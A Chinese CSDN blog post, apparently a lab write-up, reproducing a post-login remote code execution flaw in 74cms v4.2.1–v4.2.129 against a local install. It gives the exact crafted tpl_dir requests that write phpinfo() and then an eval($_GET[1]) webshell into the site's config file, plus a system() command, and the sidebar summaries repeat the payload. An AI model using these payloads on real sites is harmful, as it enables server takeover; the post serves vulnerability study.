74cms v4.2.1-v4.2.129-后台getshell漏洞复现

最新推荐文章于 2023-03-19 22:39:33 发布
最新推荐文章于 2023-03-19 22:39:33 发布
阅读量462 收藏 1
点赞数
分类专栏: 漏洞 文章标签: php html mvc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50887021/article/details/120383773
版权

74cms v4.2.1-v4.2.129-后台getshell漏洞复现

下载地址

http://www.74cms.com/download/index.html

在这里插入图片描述

漏洞复现

进入后台

http://127.0.0.1/74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=index&a=index

在这里插入图片描述抓包,修改post值

POST /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' HTTP/1.1

在这里插入图片描述
再次查看

在这里插入图片描述

查看源代码

D:\phpstudy001\PHPTutorial\WWW\74cms_Home_Setup_v4.2.111\74cms_v4.2.111\upload\Application\Home\Conf

在这里插入图片描述
抓包,修改get值

GET /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),' HTTP/1.1

在这里插入图片描述查看源代码

在这里插入图片描述

在这里插入图片描述

1=system(ipconfig);

在这里插入图片描述

blank er
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms v4.2.1-v4.2.129-后台getshell漏洞 复现
qq_43508668的博客
06-10 415
0x00 影响范围 v4.2.1-v4.2.129 0X01 环境搭建 74CMS官网 下载 v4.2.1-v4.2.129 0X02 漏洞复现 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php 路径:\74cms\up
74CMS_v4.2.1-v4.2.129后台Getshell
Fly_鹏程万里
06-23 1094
影响范围 74CMS v4.2.1~v4.2.129 漏洞危害 后台Getshell 攻击类型 后台Getshell 利用条件 登陆后台 漏洞简介 74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell漏洞分析 漏洞触发位置为TplController.class.php文件中的set函数: 74cms_Home_Setup_v4.2.111\74c...
74cms php在那个文件夹里面,74cms后台getshell
weixin_39775976的博客
03-27 241
前言没有getshell的审计都是耍流氓。今天突然灵光闪现,重新看了下74cms,终于拿下了。正文在Application/Common/Controller/BackendController.class.php有这么一段可怕的代码public function update_config($new_config, $config_file = '') {!is_file($config_fil...
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞
公众号shadow sock7
02-11 1159
参考:https://xz.aliyun.com/t/3736 后台登录状态下,访问: /74cms_v4.2.111/index.php?m=admin&c=tpl&a=set&tpl_dir=',phpinfo(),' 即可将payload写入Application/Home/Conf/config.php. Application/Common/Control...
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
标题和描述中提到的“74cms v4.2.1 v4.2.129 后台getshell漏洞”,意指该版本74cms存在后端管理界面的安全漏洞,攻击者可通过特定操作获取系统shell,即获得服务器的命令行操作权限。这是网络安全领域极为严重的一...
make-4.2.1-10.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-11.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-10.el8.x86_64.rpm
12-05
官方离线安装包,亲测可用
sed-4.2.1.rar包括sed-4.2.1-setup.exe、sed-4.2.1-dep.zip、sed-4.2.1-bin.zip
08-27
在给定的压缩包`sed-4.2.1.rar`中,包含了用于安装的`sed-4.2.1-setup.exe`,以及两个不同用途的ZIP文件:`sed-4.2.1-dep.zip`和`sed-4.2.1-bin.zip`。 **sed-4.2.1-setup.exe** `sed-4.2.1-setup.exe`是`sed`工具...
74cms 骑士人才系统 v4.2.111 正式版
10-13
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
骑士CMSPHP人才系统源码(74cms)v4.2.111正式版
07-25
骑士cms人才系统是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v4.2.66 更新内容: 修正 首页滚动条只允许审核通过的显示 修正 后
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
""" 声明: 本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io 注: 1. uid+time() 构成图片名,由于网路问题 time() 会出现一定偏差导致无法的到文件的正确名称 2. 因本工具没有设置爆破 time() 功能,故多运行几次本工具大致可以,反之,需要爆破请求的时间戳 """
74cms php在那个文件夹里面,74cms骑士人才网站系统 v5.0/v5.1后台目录地址修改教程...
weixin_35741494的博客
03-27 756
74CMS骑士人才系统是国内比较优秀的人才网站系统,使用的用户也很多,但是很多人想修改后台入口都不知道从何下手。但毕竟默认后台入口admin安全性下降,那么该到底该如何修改后台入口呢,人才港此帖就手把手教您操作步骤,让您彻底解决安全隐患。比如您目前的后台地址是https://www.huitengpet.com/admin想改为https://www.huitengpet.com/rainc,...
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1464
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
CMS 4.2.111 CSRF to RCE漏洞分析
weixin_33963189的博客
05-17 427
0x01 漏洞概述 74CMS是一套专业的人才招聘系统,其在后台更换风格模板的时候,未对参数tpl_dir的值进行严格过滤,导致危险的代码可以插入到配置文件中,进而导致任意命令执行。我在复现漏洞时发现,觉得这个漏洞更像是csrf导致的getshell。只要管理员点击攻击者构造的url,就可以插入危险代码导致命令执行。 74CMS 4.2.111下载地址:http://www.74cms....
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
m0_63253040的博客
09-25 3210
先进入网站后台/index.php?然后访问/Application/Home/Conf/config.php。猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码。输入账号aaa回显管理员账号不存在,试试admin。进入后台找到工具=>风格模板=>可用模板,抓包。302跳转登录成功密码就是admin。拉到最下面查看网站cms版本。修改tpl_dir的值为。蚁剑连接找到flag。
74cms 5.0.1 版本命令执行漏洞复现
不忘初心,护天下安全!
10-20 2241
从整体分析来看,对site_domain的输入,只会使用trim,htmlspecialchars,stripslashes,strip_tags,think_filter这几个函数做过滤,对于执行php代码,写入shell,有影响的只有strip_tags,可以通过编码绕过正常的url.php文件内容如下,从之前的代码可以看出更新域名将更新domain和COOKIE_DOMAIN对应的值,原本的域名为74cms.com,写入到文件中会在最前面加一个.。
vulfocus——骑士cms任意代码执行(CVE-2020-35339)
m0_62063669的博客
09-17 980
5.访问shell地址:/Application/Home/Conf/config.php。骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出现flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
74cms 4.2.1-129后台getshell漏洞利用教程
74cms v4.2.1 及其后续版本 v4.2.129 存在一个后台getshell漏洞。这个漏洞出现在74cms平台的管理后台部分,由于采用了ThinkPHP框架的3.2.3版本进行重构,因此其底层逻辑与TP相关。漏洞的关键在于版本升级过程中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值